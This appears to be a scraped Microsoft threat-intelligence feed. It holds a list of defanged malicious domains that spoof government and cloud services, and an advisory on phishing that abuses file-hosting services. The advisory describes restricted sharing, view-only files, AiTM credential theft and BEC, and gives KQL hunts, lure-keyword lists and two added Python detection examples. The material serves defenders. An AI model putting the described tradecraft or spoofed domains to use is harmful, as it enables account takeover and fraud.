eu-central-1-aws.minbuza[.]cloud
eu-central-1-aws.mindef-nl[.]cloud
eu-central-1-aws.msz-pl[.]cloud
eu-central-1-aws.mzv-sk[.]cloud
eu-central-1-aws.ncfta[.]cloud
eu-central-1-aws.presidencia-pt[.]cloud
eu-central-1-aws.quirinale[.]cloud
eu-central-1-aws.regeringskansliet-se[.]cloud
eu-central-1-aws.s3-be[.]cloud
eu-central-1-aws.s3-ua[.]cloud
eu-central-1-aws.ua-gov[.]cloud
eu-central-1-aws.ukrainesec[.]cloud
eu-central-2-aws.amazonsolutions[.]cloud
eu-central-2-aws.aws-ukraine[.]cloud
eu-central-2-aws.dep-no[.]cloud
eu-central-2-aws.gov-pl[.]cloud
eu-central-2-aws.gov-sk[.]cloud
eu-central-2-aws.mil-be[.]cloud
eu-central-2-aws.mil-pl[.]cloud
eu-central-2-aws.mindef-nl[.]cloud
eu-central-2-aws.msz-pl[.]cloud
eu-central-2-aws.mzv-sk[.]cloud
eu-central-2-aws.presidencia-pt[.]cloud
eu-central-2-aws.regeringskansliet-se[.]cloud
eu-central-2-aws.s3-be[.]cloud
eu-central-2-aws.ua-gov[.]cloud
eu-central-2-aws.ua-mil[.]cloud
eu-central-2-aws.ukrtelecom[.]cloud
eu-east-1-aws.amazonsolutions[.]cloud
eu-east-1-aws.dep-no[.]cloud
eu-east-1-aws.gov-sk[.]cloud
eu-east-1-aws.gov-ua[.]cloud
eu-east-1-aws.mil-be[.]cloud
eu-east-1-aws.mil-pl[.]cloud
eu-east-1-aws.minbuza[.]cloud
eu-east-1-aws.mindef-nl[.]cloud
eu-east-1-aws.msz-pl[.]cloud
eu-east-1-aws.mzv-sk[.]cloud
eu-east-1-aws.quirinale[.]cloud
eu-east-1-aws.regeringskansliet-se[.]cloud
eu-east-1-aws.s3-be[.]cloud
eu-east-1-aws.s3-de[.]cloud
eu-east-1-aws.ua-gov[.]cloud
eu-east-1-aws.ua-sec[.]cloud
eu-east-1-aws.ukrtelecom[.]cloud
eu-north-1.difesa-it[.]cloud
eu-north-1.gov-trust[.]cloud
eu-north-1.gov-ua[.]cloud
eu-north-1.gv-at[.]cloud
eu-north-1.mil-be[.]cloud
eu-north-1.mil-pl[.]cloud
eu-north-1.mzv-sk[.]cloud
eu-north-1.ncfta[.]cloud
eu-north-1.regeringskansliet-se[.]cloud
eu-north-1.s3-be[.]cloud
eu-north-1.s3-de[.]cloud
eu-north-1.s3-ua[.]cloud
eu-north-1-aws.dep-no[.]cloud
eu-north-1-aws.difesa-it[.]cloud
eu-north-1-aws.gov-pl[.]cloud
eu-north-1-aws.gov-sk[.]cloud
eu-north-1-aws.mil-be[.]cloud
eu-north-1-aws.mil-pl[.]cloud
eu-north-1-aws.minbuza[.]cloud
eu-north-1-aws.ncfta[.]cloud
eu-north-1-aws.presidencia-pt[.]cloud
eu-north-1-aws.quirinale[.]cloud
eu-north-1-aws.regeringskansliet-se[.]cloud
eu-north-1-aws.s3-be[.]cloud
eu-north-1-aws.s3-de[.]cloud
eu-north-1-aws.ua-energy[.]cloud
eu-north-1-aws.ua-gov[.]cloud
eu-south-1-aws.admin-ch[.]cloud
eu-south-1-aws.dep-no[.]cloud
eu-south-1-aws.difesa-it[.]cloud
eu-south-1-aws.gov-pl[.]cloud
eu-south-1-aws.gov-trust[.]cloud
eu-south-1-aws.mfa-gov[.]cloud
eu-south-1-aws.mil-be[.]cloud
eu-south-1-aws.minbuza[.]cloud
eu-south-1-aws.mzv-sk[.]cloud
eu-south-1-aws.quirinale[.]cloud
eu-south-1-aws.s3-be[.]cloud
eu-south-1-aws.s3-de[.]cloud
eu-south-1-aws.ua-gov[.]cloud
eu-south-2.dep-no[.]cloud
eu-south-2.gov-pl[.]cloud
eu-south-2.gov-sk[.]cloud
eu-south-2.mil-be[.]cloud
eu-south-2.mil-pl[.]cloud
eu-south-2.mindef-nl[.]cloud
eu-south-2.s3-be[.]cloud
eu-south-2.s3-de[.]cloud
eu-south-2.s3-esa[.]cloud
eu-south-2.s3-nato[.]cloud
eu-south-2.ua-sec[.]cloud
eu-south-2.ukrainesec[.]cloud
eu-south-2-aws.amazonsolutions[.]cloud
eu-south-2-aws.dep-no[.]cloud
eu-south-2-aws.gov-pl[.]cloud
eu-south-2-aws.gov-sk[.]cloud
eu-south-2-aws.mfa-gov[.]cloud
eu-south-2-aws.mil-be[.]cloud
eu-south-2-aws.mil-pl[.]cloud
eu-south-2-aws.mil-pt[.]cloud
eu-south-2-aws.minbuza[.]cloud
eu-south-2-aws.msz-pl[.]cloud
eu-south-2-aws.mzv-sk[.]cloud
eu-south-2-aws.ncfta[.]cloud
eu-south-2-aws.quirinale[.]cloud
eu-south-2-aws.regeringskansliet-se[.]cloud
eu-south-2-aws.s3-be[.]cloud
eu-south-2-aws.s3-de[.]cloud
eu-south-2-aws.s3-esa[.]cloud
eu-south-2-aws.s3-nato[.]cloud
eu-south-2-aws.s3-ua[.]cloud
eu-south-2-aws.ua-gov[.]cloud
eu-southeast-1-aws.amazonsolutions[.]cloud
eu-southeast-1-aws.aws-ukraine[.]cloud
eu-southeast-1-aws.dep-no[.]cloud
eu-southeast-1-aws.difesa-it[.]cloud
eu-southeast-1-aws.gov-sk[.]cloud
eu-southeast-1-aws.gov-trust[.]cloud
eu-southeast-1-aws.mil-be[.]cloud
eu-southeast-1-aws.mil-pl[.]cloud
eu-southeast-1-aws.mindef-nl[.]cloud
eu-southeast-1-aws.msz-pl[.]cloud
eu-southeast-1-aws.mzv-cz[.]cloud
eu-southeast-1-aws.mzv-sk[.]cloud
eu-southeast-1-aws.quirinale[.]cloud
eu-southeast-1-aws.s3-be[.]cloud
eu-southeast-1-aws.s3-de[.]cloud
eu-southeast-1-aws.s3-esa[.]cloud
eu-southeast-1-aws.s3-ua[.]cloud
eu-southeast-1-aws.ua-energy[.]cloud
eu-southeast-1-aws.ukrainesec[.]cloud
eu-west-1.aws-ukraine[.]cloud
eu-west-1.difesa-it[.]cloud
eu-west-1.gov-sk[.]cloud
eu-west-1.mil-be[.]cloud
eu-west-1.mil-pl[.]cloud
eu-west-1.minbuza[.]cloud
eu-west-1.msz-pl[.]cloud
eu-west-1.mzv-sk[.]cloud
eu-west-1.regeringskansliet-se[.]cloud
eu-west-1.s3-de[.]cloud
eu-west-1.s3-esa[.]cloud
eu-west-1.s3-ua[.]cloud
eu-west-1.ua-gov[.]cloud
eu-west-1.ukrtelecom[.]cloud
eu-west-1-aws.amazonsolutions[.]cloud
eu-west-1-aws.aws-ukraine[.]cloud
eu-west-1-aws.dep-no[.]cloud
eu-west-1-aws.gov-pl[.]cloud
eu-west-1-aws.gov-sk[.]cloud
eu-west-1-aws.gov-trust[.]cloud
eu-west-1-aws.gov-ua[.]cloud
eu-west-1-aws.mil-be[.]cloud
eu-west-1-aws.mil-pl[.]cloud
eu-west-1-aws.minbuza[.]cloud
eu-west-1-aws.quirinale[.]cloud
eu-west-1-aws.s3-be[.]cloud
eu-west-1-aws.s3-de[.]cloud
eu-west-1-aws.s3-esa[.]cloud
eu-west-1-aws.s3-nato[.]cloud
eu-west-1-aws.ua-sec[.]cloud
eu-west-1-aws.ukrainesec[.]cloud
eu-west-2-aws.amazonsolutions[.]cloud
eu-west-2-aws.dep-no[.]cloud
eu-west-2-aws.difesa-it[.]cloud
eu-west-2-aws.gov-pl[.]cloud
eu-west-2-aws.gov-sk[.]cloud
eu-west-2-aws.gv-at[.]cloud
eu-west-2-aws.mil-be[.]cloud
eu-west-2-aws.mil-pl[.]cloud
eu-west-2-aws.minbuza[.]cloud
eu-west-2-aws.mindef-nl[.]cloud
eu-west-2-aws.msz-pl[.]cloud
eu-west-2-aws.mzv-sk[.]cloud
eu-west-2-aws.quirinale[.]cloud
eu-west-2-aws.s3-be[.]cloud
eu-west-2-aws.s3-de[.]cloud
eu-west-2-aws.s3-esa[.]cloud
eu-west-2-aws.s3-nato[.]cloud
eu-west-2-aws.s3-ua[.]cloud
eu-west-2-aws.ua-sec[.]cloud
eu-west-3.amazonsolutions[.]cloud
eu-west-3.aws-ukraine[.]cloud
eu-west-3.mil-be[.]cloud
eu-west-3.mil-pl[.]cloud
eu-west-3.minbuza[.]cloud
eu-west-3.mindef-nl[.]cloud
eu-west-3.msz-pl[.]cloud
eu-west-3.mzv-sk[.]cloud
eu-west-3.presidencia-pt[.]cloud
eu-west-3.s3-be[.]cloud
eu-west-3.s3-ua[.]cloud
eu-west-3.ukrainesec[.]cloud
eu-west-3.ukrtelecom[.]cloud
eu-west-3-aws.aws-ukraine[.]cloud
eu-west-3-aws.dep-no[.]cloud
eu-west-3-aws.difesa-it[.]cloud
eu-west-3-aws.gov-pl[.]cloud
eu-west-3-aws.gov-sk[.]cloud
eu-west-3-aws.gov-trust[.]cloud
eu-west-3-aws.mil-be[.]cloud
eu-west-3-aws.mil-pl[.]cloud
eu-west-3-aws.mil-pt[.]cloud
eu-west-3-aws.minbuza[.]cloud
eu-west-3-aws.mindef-nl[.]cloud
eu-west-3-aws.msz-pl[.]cloud
eu-west-3-aws.mzv-sk[.]cloud
eu-west-3-aws.quirinale[.]cloud
eu-west-3-aws.regeringskansliet-se[.]cloud
eu-west-3-aws.s3-be[.]cloud
eu-west-3-aws.s3-ua[.]cloud
eu-west-3-aws.ua-mil[.]cloud
us-east-1-aws.mfa-gov[.]cloud
us-east-1-aws.s3-ua[.]cloud
us-east-1-aws.ua-gov[.]cloud
us-east-1-aws.ua-sec[.]cloud
us-east-2.aws-ukraine[.]cloud
us-east-2.gov-ua[.]cloud
us-east-2.ua-sec[.]cloud
us-east-2.ukrainesec[.]cloud
us-east-2-aws.gov-ua[.]cloud
us-east-2-aws.ua-gov[.]cloud
us-east-2-aws.ukrtelecom[.]cloud
us-east-console.aws-ukraine[.]cloud
us-east-console.ua-energy[.]cloud
us-west-1.aws-ukraine[.]cloud
us-west-1.ua-energy[.]cloud
us-west-1.ua-gov[.]cloud
us-west-1.ukrtelecom[.]cloud
us-west-1-amazon.ua-energy[.]cloud
us-west-1-amazon.ua-mil[.]cloud
us-west-1-amazon.ua-sec[.]cloud
us-west-1-aws.gov-ua[.]cloud
us-west-2.gov-ua[.]cloud
us-west-2.ua-energy[.]cloud
us-west-2.ua-sec[.]cloud
us-west-2-aws.mfa-gov[.]cloud
us-west-2-aws.s3-ua[.]cloud
us-west-2-aws.ua-energy[.]cloud

References

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Midnight Blizzard conducts large-scale spear-phishing campaign using RDP files appeared first on Microsoft Security Blog.

File hosting services misused for identity phishing http://approjects.co.za/?big=en-us/security/blog/2024/10/08/file-hosting-services-misused-for-identity-phishing/ Tue, 08 Oct 2024 16:00:00 +0000 Since mid-April 2024, Microsoft has observed an increase in defense evasion tactics used in campaigns abusing file hosting services like SharePoint, OneDrive, and Dropbox. These campaigns use sophisticated techniques to perform social engineering, evade detection, and compromise identities, and include business email compromise (BEC) attacks.

The post File hosting services misused for identity phishing appeared first on Microsoft Security Blog.

Microsoft has observed that campaigns misusing legitimate file hosting services are increasingly using defense evasion tactics involving files with restricted access and view-only restrictions. While these campaigns are generic and opportunistic in nature, they involve sophisticated techniques to perform social engineering, evade detection, and expand threat actor reach to other accounts and tenants. These campaigns are intended to compromise identities and devices, and most commonly lead to business email compromise (BEC) attacks to propagate campaigns, among other impacts such as financial fraud, data exfiltration, and lateral movement to endpoints.

Legitimate hosting services, such as SharePoint, OneDrive, and Dropbox, are widely used by organizations for storing, sharing, and collaborating on files. However, the widespread use of such services also makes them attractive targets for threat actors, who exploit the trust and familiarity associated with these services to deliver malicious files and links, often avoiding detection by traditional security measures.

Importantly, Microsoft takes action against malicious users violating the Microsoft Services Agreement in how they use apps like SharePoint and OneDrive. To help protect enterprise accounts from compromise, by default both Microsoft 365 and Office 365 support multi-factor authentication (MFA) and passwordless sign-in. Consumers can also go passwordless with their Microsoft account. Because security is a team sport, Microsoft also works with third parties like Dropbox to share threat intelligence and protect mutual customers and the wider community.

In this blog, we discuss the typical attack chain used in campaigns misusing file hosting services and detail the recently observed tactics, techniques, and procedures (TTPs), including the increasing use of certain defense evasion tactics. To help defenders protect their identities and data, we also share mitigation guidance to help reduce the impact of this threat, and detection details and hunting queries to locate potential misuse of file hosting services and related threat actor activities. By understanding these evolving threats and implementing the recommended mitigations, organizations can better protect themselves against these sophisticated campaigns and safeguard digital assets.

Attack overview

Phishing campaigns exploiting legitimate file hosting services have been trending throughout the last few years, especially due to the relative ease of the technique. The files are delivered through different approaches, including email and email attachments like PDFs, OneNote, and Word files, with the intent of compromising identities or devices. These campaigns are different from traditional phishing attacks because of the sophisticated defense evasion techniques used.

Since mid-April 2024, we observed threat actors increasingly use these tactics aimed at circumventing defense mechanisms:

  • Files with restricted access: The files sent through the phishing emails are configured to be accessible solely to the designated recipient. This requires the recipient to be signed in to the file-sharing service—be it Dropbox, OneDrive, or SharePoint—or to re-authenticate by entering their email address along with a one-time password (OTP) received through a notification service.
  • Files with view-only restrictions: To bypass analysis by email detonation systems, the files shared in these phishing attacks are set to ‘view-only’ mode, disabling the ability to download and consequently, the detection of embedded URLs within the file.

An example attack chain is provided below, depicting the updated defense evasion techniques being used across stages 4, 5, and 6:

Attack chain diagram. Step 1, attacker compromises a user of a trusted vendor via password spray/AiTM attack. Step 2, attacker replays stolen token a few hours later to sign into the user’s file hosting app. Step 3, attacker creates a malicious file in the compromised user’s file hosting app. Step 4, attacker shares the file with restrictions to a group of targeted recipients. Step 5, targeted recipient accesses the automated email notification with the suspicious file. Step 6, recipient is required to re-authenticate before accessing the shared file. Step 7, recipient accesses the malicious shared file link, directing to an AiTM page. Step 8, recipient submits password and MFA, compromising the user’s session token. Lastly, step 9, file shared on the compromised user’s file hosting app is used for further AiTM and BEC attacks.
Figure 1. Example attack chain

Initial access

The attack typically begins with the compromise of a user within a trusted vendor. After compromising the trusted vendor, the threat actor hosts a file on the vendor’s file hosting service, which is then shared with a target organization. This misuse of legitimate file hosting services is particularly effective because recipients are more likely to trust emails from known vendors, allowing threat actors to bypass security measures and compromise identities. Often, users from trusted vendors are added to allow lists through policies set by the organization on Exchange Online products, enabling phishing emails to be successfully delivered.

While file names observed in these campaigns also included the recipients, the hosted files typically follow these patterns:

  • Familiar topics based on existing conversations
    • For example, if the two organizations have prior interactions related to an audit, the shared files could be named “Audit Report 2024”.
  • Familiar topics based on current context
    • If the attack has not originated from a trusted vendor, the threat actor often impersonates administrators or help desk or IT support personnel in the sender display name and uses a file name such as “IT Filing Support 2024”, “Forms related to Tax submission”, or “Troubleshooting guidelines”.
  • Topics based on urgency
    • Another common technique is to create a sense of urgency with file names like “Urgent:Attention Required” and “Compromised Password Reset”.

Defense evasion techniques

Once the threat actor shares the files on the file hosting service with the intended users, the file hosting service sends the target user an automated email notification with a link to access the file securely. This email is not a phishing email but a notification for the user about the sharing action. In scenarios involving SharePoint or OneDrive, the file is shared from the user’s context, with the compromised user’s email address as the sender. However, in the Dropbox scenario, the file is shared from no-reply@dropbox[.]com. The files are shared through automated notification emails with the subject: “<User> shared <document> with you”. To evade detections, the threat actor deploys the following additional techniques:

  • Only the intended recipient can access the file
    • The intended recipient needs to re-authenticate before accessing the file
    • The file is accessible only for a limited time window
  • The PDF shared in the file cannot be downloaded

Because the file is restricted in these ways, detonating and analyzing the sample that carries the malicious link is almost impossible.

Identity compromise

When the targeted user accesses the shared file, the user is prompted to verify their identity by providing their email address:

Screenshot of the SharePoint identity verification page
Figure 2. Screenshot of SharePoint identity verification

Next, an OTP is sent from no-reply@notify.microsoft[.]com. Once the OTP is submitted, the user is successfully authorized and can view a document, often masquerading as a preview, with a malicious link, which is another lure to make the targeted user click the “View my message” access link.

Screenshot displaying a message noting a completed document due on 7/11/2024. The button at the bottom states "View my message".
Figure 3. Final landing page post authorization

This link redirects the user to an adversary-in-the-middle (AiTM) phishing page, where the user is prompted to provide the password and complete multifactor authentication (MFA). The compromised token can then be leveraged by the threat actor to perform the second stage BEC attack and continue the campaign.

Microsoft recommends the following mitigations to reduce the impact of this threat:

Appendix

Microsoft Defender XDR detections

Microsoft Defender XDR raises the following alerts by combining Microsoft Defender for Office 365 URL click signals with Microsoft Entra ID Protection risky sign-in signals.

  • Risky sign-in after clicking a possible AiTM phishing URL
  • User compromised through session cookie hijack
  • User compromised in a known AiTM phishing kit

Hunting queries

Microsoft Defender XDR 

The file sharing events related to the activity in this blog post can be audited through the CloudAppEvents telemetry. Microsoft Defender XDR customers can run the following query to find related activity in their networks: 

Automated email notifications and suspicious sign-in activity

By correlating the email from the Microsoft notification service or Dropbox automated notification service with a suspicious sign-in activity, we can identify compromises, especially from securely shared SharePoint or Dropbox files.

let usersWithSuspiciousEmails = EmailEvents
    | where SenderFromAddress in ("no-reply@notify.microsoft.com", "no-reply@dropbox.com") or InternetMessageId startswith "<OneTimePasscode"
    | where isnotempty(RecipientObjectId)
    | distinct RecipientObjectId;
AADSignInEventsBeta
| where AccountObjectId in (usersWithSuspiciousEmails)
| where RiskLevelDuringSignIn == 100

Files share contents and suspicious sign-in activity

In the majority of the campaigns, the file name conveys a sense of urgency or relates to finance or credential updates (for example: Alex shared “Password Reset Mandatory.pdf” with you). By correlating the file share emails with suspicious sign-ins, compromises can be detected. Since these are observed as campaigns, validating that the same file has been shared with multiple users in the organization can support the detection.

let usersWithSuspiciousEmails = EmailEvents
    | where Subject has_all ("shared", "with you")
    | where Subject has_any ("payment", "invoice", "urgent", "mandatory", "Payoff", "Wire", "Confirmation", "password")
    | where isnotempty(RecipientObjectId)
    | summarize RecipientCount = dcount(RecipientObjectId), RecipientList = make_set(RecipientObjectId) by Subject
    | where RecipientCount >= 10
    | mv-expand RecipientList to typeof(string)
    | distinct RecipientList;
AADSignInEventsBeta
| where AccountObjectId in (usersWithSuspiciousEmails)
| where RiskLevelDuringSignIn == 100
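The two hunts above can be exercised offline before they are deployed. The Python below is an added example, not code from the original post or from Microsoft: it implements the same two let-blocks (notification-sender match and lure-subject fan-out) and the final high-risk sign-in join over constructed EmailEvents and AADSignInEventsBeta-style records. The column names are the ones the queries use; the user ids, subjects and the vendor sender addresses are constructed sample values.

```python
"""Correlate file-sharing notification emails with high-risk sign-ins.

Added example (not Microsoft's code): an offline rendering of the two
Defender XDR hunting queries above, run over constructed records whose
field names mirror the EmailEvents and AADSignInEventsBeta columns.
"""
from collections import defaultdict

NOTIFICATION_SENDERS = {"no-reply@notify.microsoft.com", "no-reply@dropbox.com"}
# Lure words from the second query, compared case-insensitively like KQL has_any
SUBJECT_KEYWORDS = ("payment", "invoice", "urgent", "mandatory",
                    "payoff", "wire", "confirmation", "password")
HIGH_RISK = 100  # RiskLevelDuringSignIn value used by the queries


def users_with_notification_emails(email_events):
    """First query's let-block: recipients of a SharePoint/OneDrive OTP or
    Dropbox notification, or of a message whose id starts with <OneTimePasscode."""
    users = set()
    for e in email_events:
        sender = e.get("SenderFromAddress", "").lower()
        msg_id = e.get("InternetMessageId", "")
        if sender in NOTIFICATION_SENDERS or msg_id.startswith("<OneTimePasscode"):
            if e.get("RecipientObjectId"):
                users.add(e["RecipientObjectId"])
    return users


def users_in_share_campaign(email_events, min_recipients=10):
    """Second query's let-block: '<User> shared <doc> with you' subjects that
    carry a lure keyword and reached at least min_recipients distinct users."""
    recipients_by_subject = defaultdict(set)
    for e in email_events:
        subject = e.get("Subject", "")
        lowered = subject.lower()
        if "shared" not in lowered or "with you" not in lowered:
            continue
        if not any(k in lowered for k in SUBJECT_KEYWORDS):
            continue
        if e.get("RecipientObjectId"):
            recipients_by_subject[subject].add(e["RecipientObjectId"])
    flagged = set()
    for recipients in recipients_by_subject.values():
        if len(recipients) >= min_recipients:
            flagged |= recipients
    return flagged


def risky_sign_ins_for(users, sign_in_events):
    """Final step of both queries: high-risk sign-ins by any of the given users."""
    return [s for s in sign_in_events
            if s.get("AccountObjectId") in users
            and s.get("RiskLevelDuringSignIn") == HIGH_RISK]


def sample_data():
    """Constructed telemetry: one 12-recipient lure campaign, one benign share,
    one OTP notification, and four sign-ins of varying risk."""
    lure_subject = 'Alex shared "Password Reset Mandatory.pdf" with you'
    emails = [{"Subject": lure_subject, "SenderFromAddress": "alex@vendor.example",
               "RecipientObjectId": f"u{i:02d}"} for i in range(1, 13)]
    emails += [{"Subject": "Pat shared Q3 Roadmap.pptx with you",
                "SenderFromAddress": "pat@partner.example", "RecipientObjectId": u}
               for u in ("u20", "u21")]
    emails.append({"Subject": "Your verification code",
                   "SenderFromAddress": "no-reply@notify.microsoft.com",
                   "InternetMessageId": "<OneTimePasscode.abc@notify.microsoft.com>",
                   "RecipientObjectId": "u03"})
    sign_ins = [{"AccountObjectId": "u03", "RiskLevelDuringSignIn": 100},
                {"AccountObjectId": "u07", "RiskLevelDuringSignIn": 100},
                {"AccountObjectId": "u20", "RiskLevelDuringSignIn": 100},
                {"AccountObjectId": "u05", "RiskLevelDuringSignIn": 0}]
    return emails, sign_ins


def run_hunts(email_events, sign_in_events):
    """Run both hunts; returns the sorted AccountObjectIds each one surfaces."""
    otp_users = users_with_notification_emails(email_events)
    campaign_users = users_in_share_campaign(email_events)
    return (sorted(s["AccountObjectId"] for s in risky_sign_ins_for(otp_users, sign_in_events)),
            sorted(s["AccountObjectId"] for s in risky_sign_ins_for(campaign_users, sign_in_events)))


if __name__ == "__main__":
    print(run_hunts(*sample_data()))
```

Note that u20 signs in with high risk but is never surfaced: the benign share carries no lure word and reaches only two users, which is exactly the false-positive the campaign fan-out threshold is meant to suppress.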

BEC: File sharing tactics based on the file hosting service used

To initiate the file sharing activity, these campaigns commonly use certain action types depending on the file hosting service being leveraged. Below are the action types recorded in the audit logs for the file sharing events. They can be used to hunt for activities related to these campaigns by substituting the action type for the respective application in the queries that follow this table.

Application: OneDrive/SharePoint
  • AnonymousLinkCreated: Link created for the document; anyone with the link can access it. Prevalence is rare since mid-April 2024.
  • SharingLinkCreated: Link created for the document, accessible to everyone. Prevalence is rare since mid-April 2024.
  • AddedToSharingLink: The complete list of users with whom the file is shared is available in this event.
  • SecureLinkCreated: Link created for the document that can be accessed only by a specific group of users. The list is available in the AddedToSecureLink event.
  • AddedToSecureLink: The complete list of users with whom the file is securely shared is available in this event.

Application: Dropbox
  • Created shared link: A link was created for a file to be shared with an external user.
  • Added shared folder to own Dropbox: A shared folder was added to the user’s Dropbox account.
  • Added users and/or groups to shared file/folder; Changed the audience of the shared link; Invited user to Dropbox and added them to shared file/folder: These action types include the list of external users with whom the files have been shared.

OneDrive or SharePoint: The following query highlights that a specific file has been shared by a user with multiple participants. Correlating this activity with suspicious sign-in attempts preceding this can help identify lateral movements and BEC attacks.

let securelinkCreated = CloudAppEvents
    | where ActionType == "SecureLinkCreated"
    | project FileCreatedTime = Timestamp, AccountObjectId, ObjectName;
let filesCreated = securelinkCreated
    | where isnotempty(ObjectName)
    | distinct tostring(ObjectName);
CloudAppEvents
| where ActionType == "AddedToSecureLink"
| where Application in ("Microsoft SharePoint Online", "Microsoft OneDrive for Business")
| extend FileShared = tostring(RawEventData.ObjectId)
| where FileShared in (filesCreated)
| extend UserSharedWith = tostring(RawEventData.TargetUserOrGroupName)
| extend TypeofUserSharedWith = RawEventData.TargetUserOrGroupType
| where TypeofUserSharedWith == "Guest"
| where isnotempty(FileShared) and isnotempty(UserSharedWith)
| join kind=inner securelinkCreated on $left.FileShared==$right.ObjectName
// Secure file created recently (in the last 1 day): the share must follow the link creation by 0h to 1d
| where (Timestamp - FileCreatedTime) between (0h .. 1d)
| summarize NumofUsersSharedWith = dcount(UserSharedWith) by FileShared
| where NumofUsersSharedWith >= 20

Dropbox: The following query highlights that a file hosted on Dropbox has been shared with multiple participants.

CloudAppEvents
| where ActionType in ("Added users and/or groups to shared file/folder", "Invited user to Dropbox and added them to shared file/folder")
| where Application == "Dropbox"
| where ObjectType == "File"
| extend FileShared = tostring(ObjectName)
| where isnotempty(FileShared)
| mv-expand ActivityObjects
| where ActivityObjects.Type == "Account" and ActivityObjects.Role == "To"
| extend SharedBy = AccountId
| extend UserSharedWith = tostring(ActivityObjects.Name)
| summarize dcount(UserSharedWith) by FileShared, AccountObjectId
| where dcount_UserSharedWith >= 20

Microsoft Sentinel

Microsoft Sentinel customers can use the resources below to find related activities similar to those described in this post:

The following query identifies files with specific keywords that attackers might use in this campaign that have been shared through OneDrive or SharePoint using a Secure Link and accessed by over 10 unique users. It captures crucial details like target users, client IP addresses, timestamps, and file URLs to aid in detecting potential attacks:

let OperationName = dynamic(['SecureLinkCreated', 'AddedToSecureLink']);
OfficeActivity
| where Operation in (OperationName)
| where OfficeWorkload in ('OneDrive', 'SharePoint')
| where SourceFileName has_any ("payment", "invoice", "urgent", "mandatory", "Payoff", "Wire", "Confirmation", "password", "paycheck", "bank statement", "bank details", "closing", "funds", "bank account", "account details", "remittance", "deposit", "Reset")
| summarize CountOfShares = dcount(TargetUserOrGroupName), 
            make_list(TargetUserOrGroupName), 
            make_list(ClientIP), 
            make_list(TimeGenerated), 
            make_list(SourceRelativeUrl) by SourceFileName, OfficeWorkload
| where CountOfShares > 10
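The secure-link fan-out logic behind the OneDrive/SharePoint query above and the keyword filter of this Sentinel query can be tested offline. The Python below is an added example, not code from the original post, from Microsoft or from Sentinel: it pairs each AddedToSecureLink event with a SecureLinkCreated event for the same file inside the 1-day window, counts distinct guest targets per file against the query's threshold of 20, and exposes the Sentinel lure-keyword check as a function. The CloudAppEvents-style records, file names and guest addresses are constructed sample values.

```python
"""Detect a secure-link file shared with many external users soon after the
link was created.

Added example (not Microsoft's or Sentinel's code): an offline rendering of the
OneDrive/SharePoint secure-link query and the Sentinel OfficeActivity keyword
filter, over constructed CloudAppEvents-style records.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SHAREPOINT_APPS = {"Microsoft SharePoint Online", "Microsoft OneDrive for Business"}
# Lure words from the Sentinel query, matched case-insensitively like has_any
LURE_KEYWORDS = ("payment", "invoice", "urgent", "mandatory", "payoff", "wire",
                 "confirmation", "password", "paycheck", "bank statement",
                 "bank details", "closing", "funds", "bank account",
                 "account details", "remittance", "deposit", "reset")


def has_lure_keyword(file_name):
    lowered = file_name.lower()
    return any(k in lowered for k in LURE_KEYWORDS)


def secure_link_fanout(events, window=timedelta(days=1), min_targets=20,
                       guest_only=True):
    """Return {file: distinct target count} for files whose AddedToSecureLink
    events reached >= min_targets users within `window` after a SecureLinkCreated
    event for the same file. With guest_only, only external (Guest) targets count."""
    created_at = defaultdict(list)          # ObjectName -> link creation timestamps
    for e in events:
        if e.get("ActionType") == "SecureLinkCreated" and e.get("ObjectName"):
            created_at[e["ObjectName"]].append(e["Timestamp"])

    targets = defaultdict(set)              # file -> users it was shared with
    for e in events:
        if e.get("ActionType") != "AddedToSecureLink":
            continue
        if e.get("Application") not in SHAREPOINT_APPS:
            continue
        raw = e.get("RawEventData", {})
        file_shared = raw.get("ObjectId")
        target = raw.get("TargetUserOrGroupName")
        if not file_shared or not target or file_shared not in created_at:
            continue
        if guest_only and raw.get("TargetUserOrGroupType") != "Guest":
            continue
        # The share must follow some link creation for this file by at most `window`
        if any(timedelta(0) <= e["Timestamp"] - t <= window for t in created_at[file_shared]):
            targets[file_shared].add(target)

    return {f: len(users) for f, users in targets.items() if len(users) >= min_targets}


def _share_events(file_name, created, first_share, n_targets, user_type="Guest"):
    """Build one SecureLinkCreated record plus n_targets AddedToSecureLink records,
    one target per minute starting at first_share (constructed data)."""
    events = [{"ActionType": "SecureLinkCreated", "Timestamp": created,
               "Application": "Microsoft SharePoint Online", "ObjectName": file_name}]
    for i in range(n_targets):
        events.append({"ActionType": "AddedToSecureLink",
                       "Timestamp": first_share + timedelta(minutes=i),
                       "Application": "Microsoft SharePoint Online",
                       "RawEventData": {"ObjectId": file_name,
                                        "TargetUserOrGroupName": f"guest{i:02d}@external.example",
                                        "TargetUserOrGroupType": user_type}})
    return events


def sample_events():
    """Constructed audit records: a lure shared with 25 guests two hours after
    link creation, a benign document shared with 3 guests, and an old file whose
    25 shares happen three days after its link was created."""
    t0 = datetime(2024, 5, 2, 9, 0)
    events = _share_events("Wire Confirmation.pdf", t0, t0 + timedelta(hours=2), 25)
    events += _share_events("Team Notes.docx", t0, t0 + timedelta(hours=1), 3)
    events += _share_events("Old Invoice.pdf", t0 - timedelta(days=3), t0, 25)
    return events


if __name__ == "__main__":
    for name, count in secure_link_fanout(sample_events()).items():
        print(f"{name}: shared with {count} guests; lure keyword: {has_lure_keyword(name)}")
```

Widening the window to a week makes the old invoice show up as well, which is the knob to turn when an actor stages the file well before the sharing burst.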

Considering that the attacker compromises users through AiTM,  possible AiTM phishing attempts can be detected through the below rule:

In addition, customers can also use the following identity-focused queries to detect and investigate anomalous sign-in events that may be indicative of a compromised user identity being accessed by a threat actor:

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

